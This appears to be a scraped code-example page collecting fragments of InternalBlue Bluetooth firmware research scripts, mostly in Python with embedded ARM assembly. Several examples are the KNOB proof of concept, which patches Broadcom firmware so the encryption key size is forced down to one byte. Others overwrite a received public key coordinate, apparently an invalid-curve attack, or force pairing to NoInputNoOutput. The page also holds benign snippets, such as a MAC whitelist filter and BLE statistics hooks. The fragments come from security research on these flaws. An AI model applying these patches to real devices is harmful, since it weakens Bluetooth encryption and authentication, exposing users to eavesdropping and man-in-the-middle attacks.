Пример #1
# Jiska Classen, Secure Mobile Networking Lab
from internalblue import Address
from internalblue.adbcore import ADBCore
from pwnlib.asm import asm
from binascii import unhexlify
Filter connections by MAC address before entering LMP dispatcher.
Enter MAC addresses you trust into whitelist.

WHITELIST = ["aabbccddeeff", "133713371337", "affedeadbeef"]

WHITELIST_BYTES = unhexlify(
    ''.join(WHITELIST))[::-1]  # change mac addr byte order
HOOK_LMP_FILTER = Address(0x3f3f4)  # This function is in ROM
ASM_LOCATION_LMP_FILTER = 0x00211900  # 0xD5900
b lmp_dispatcher_filter

    push {r2-r8, lr}        // the patche's branch overwrote the original function's push
    // continue similar to original function to get the connection struct
    ldr  r7, =0x200478
    ldrh r0, [r0, 2]
    ldr  r1, [r7, 0x4] 
    ldrb r1, [r1, 0xc]
    lsrs r6, r1, 1          // LMP opcode
    bl   0x42c04            // get_ptr_to_connection_struct_from_index_42C04, r0=conn_struct
Пример #2
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")

    "Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!"

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x689F0)  # connection struct key entropy
internalblue.patchRom(Address(0x689F0), patch)

# modify global variable for own setting
internalblue.writeMem(0x204127, b'\x01')  # global key entropy

    "Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
    "Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
    "For more details, see special instructions for BlueZ.\n"
    "Automatically continuing on KNOB interface...\n"
    "Use the 'knob' command to *debug* the attack, i.e.:\n"
    "    knob --hnd 0x0c\n"
    "...shows the key size of handle 0x000c.\n")
Пример #3
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")

    "Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!"

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x3B3D4)  # connection struct key entropy
internalblue.patchRom(Address(0x3B3D4), patch)

# modify global variable for own setting
internalblue.writeMem(0x204A5F, b'\x01')  # global key entropy

    "Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
    "Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
    "For more details, see special instructions for BlueZ.\n"
    "Automatically continuing on KNOB interface...\n"
    "Use the 'knob' command to *debug* the attack, i.e.:\n"
    "    knob --hnd 0x0c\n"
    "...shows the key size of handle 0x000c.\n")
Пример #4
    serial=False)  # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")

    "Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!"

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x5AED0)  # connection struct key entropy
internalblue.patchRom(Address(0x5AED0), patch)

# modify global variable for own setting
internalblue.writeMem(0x203797, b'\x01')  # global key entropy

    "Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
    "To monitor device behavior, continue on the CLI, ideally with diagnostic LMP mode.\n"
    "On Android, this requires a modified bluetooth.default.so.\n"
    "Automatically continuing on KNOB interface...\n"
    "Use the 'knob' command to *debug* the attack, i.e.:\n"
    "    knob --hnd 0x0c\n"
    "...shows the key size of handle 0x000c.\n")
Пример #5
internalblue = ADBCore(serial=True)
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

    "Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!"

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x530F6)  # connection struct key entropy
internalblue.patchRom(Address(0x530F6), patch)

# modify global variable for own setting
internalblue.writeMem(0x255E8F, b'\x01')  # global key entropy

    "Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
    "To monitor device behavior, continue on the CLI, ideally with diagnostic LMP mode.\n"
    "On Android, this requires a modified bluetooth.default.so.\n"
    "Automatically continuing on KNOB interface...\n"
    "Use the 'knob' command to *debug* the attack, i.e.:\n"
    "    knob --hnd 0x0c\n"
    "...shows the key size of handle 0x000c.\n")
Пример #6
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

    "Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!"

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x7402A)  # connection struct key entropy
internalblue.patchRom(Address(0x7402A), patch)

# modify global variable for own setting
internalblue.writeMem(0x280F13, b'\x01')  # global key entropy

    "Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
    "Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
    "For more details, see special instructions for BlueZ.\n"
    "Automatically continuing on KNOB interface...\n"
    "Use the 'knob' command to *debug* the attack, i.e.:\n"
    "    knob --hnd 0x0c\n"
    "...shows the key size of handle 0x000c.\n")
Пример #7
# Jiska Classen

# Get receive statistics on a Raspberry Pi 3 for BLE connection events
from internalblue import Address
from internalblue.hcicore import HCICore
from pwnlib.asm import asm

internalblue = HCICore()
device_list = internalblue.device_list()
if len(device_list) == 0:
    internalblue.logger.warn("No HCI devices connected!")
internalblue.interface = device_list[0][1]  # just use the first device

RX_DONE_HOOK_ADDRESS = Address(0x35fbc)  # _connTaskRxDone

    // restore first 4 bytes of _connTaskRxDone
    push  {r4-r6,lr}
    mov   r4, r0

    // fix registers for our own routine
    push  {r1-r7, lr}
    mov   r7, r0

    // allocate vendor specific hci event
    mov  r2, 243
    mov  r1, 0xff
    mov  r0, 245
Пример #8
#!/usr/bin/env python2

# Dennis Mantz
from internalblue import Address
from internalblue.adbcore import ADBCore
from internalblue.utils.pwnlib_wrapper import log, asm
#internalblue = core.InternalBlue()

internalblue = ADBCore()
device_list = internalblue.device_list()
if len(device_list) == 0:
    log.warn("No ADB devices connected!")
internalblue.interface = device_list[0][1]  # just use the first device

PK_SEND_HOOK_ADDRESS = Address(0x030098)
GEN_PRIV_KEY_ADDRESS = Address(0x48eba)
b pk_recv_hook
b pk_send_hook
b gen_priv_key

// overwrite y-coordinate of received PK point
    push {r0-r3,lr}
    strb.w  r0, [r4, 170]
    ldr r0, =0x205614
    mov r1, 6
    mov r2, 0
Пример #9
        0x00 MITM Protection Not Required - No Bonding. Numeric comparison with automatic accept allowed.
        0x01 MITM Protection Required - No Bonding. Use IO Capabilities to determine authentication procedure
        0x02 MITM Protection Not Required - Dedicated Bonding. Numeric comparison with automatic accept allowed.
        0x03 MITM Protection Required - Dedicated Bonding. Use IO Capabilities to determine authentication procedure
        0x04 MITM Protection Not Required - General Bonding. Numeric Comparison with automatic accept allowed.
        0x05 MITM Protection Required - General Bonding. Use IO capabilities to determine authentication procedure.

    This seems to work, but tends to be buggy depending on what information is cached in which smartphone.
    Probably not that good for a live demo, better do a screenshot here.


    0x303D4)  # we just change the complete simple pairing state machine
ASM_LOCATION_IO_CAP_RESP = 0x00211800  #0xd7800
        //restore original 8 bytes of instructions which we overwrite by patching a branch into it
        push {r4-r6, lr}
        mov  r4, r0
        //overwrite variables used by sp_sm_io_cap_req_reply__lmp_io_cap_req_res_30286
        //which actually executes:
        //   send_LMP_IO_Capability_req_301E4
        //   send_LMP_IO_Capability_res_30170
        push {r0-r1, lr}    //variables we need in our actual subroutine here        
        ldr  r1, =0x20387D  //io_caps__auth_req_20387D
        //oob and auth_req are already set to 0x00...
        ldrb r0, =0x03      //io_cap 0x03: NoInputNoOutput
Пример #10
# Jiska Classen

# Get receive statistics on a Raspberry Pi 3 for BLE connection events
from pwnlib.asm import asm
from internalblue import Address
from internalblue.hcicore import HCICore

internalblue = HCICore()
device_list = internalblue.device_list()
if len(device_list) == 0:
    internalblue.logger.warning("No HCI devices connected!")
internalblue.interface = device_list[0][1]  # just use the first device

RX_DONE_HOOK_ADDRESS = Address(0x56622)  # _connTaskRxDone

    // restore first 4 bytes of _connTaskRxDone
    push  {r4-r6,lr}
    mov   r4, r0

    // fix registers for our own routine
    push  {r1-r7, lr}
    mov   r7, r0

    // allocate vendor specific hci event
    mov  r2, 243
    mov  r1, 0xff
    mov  r0, 245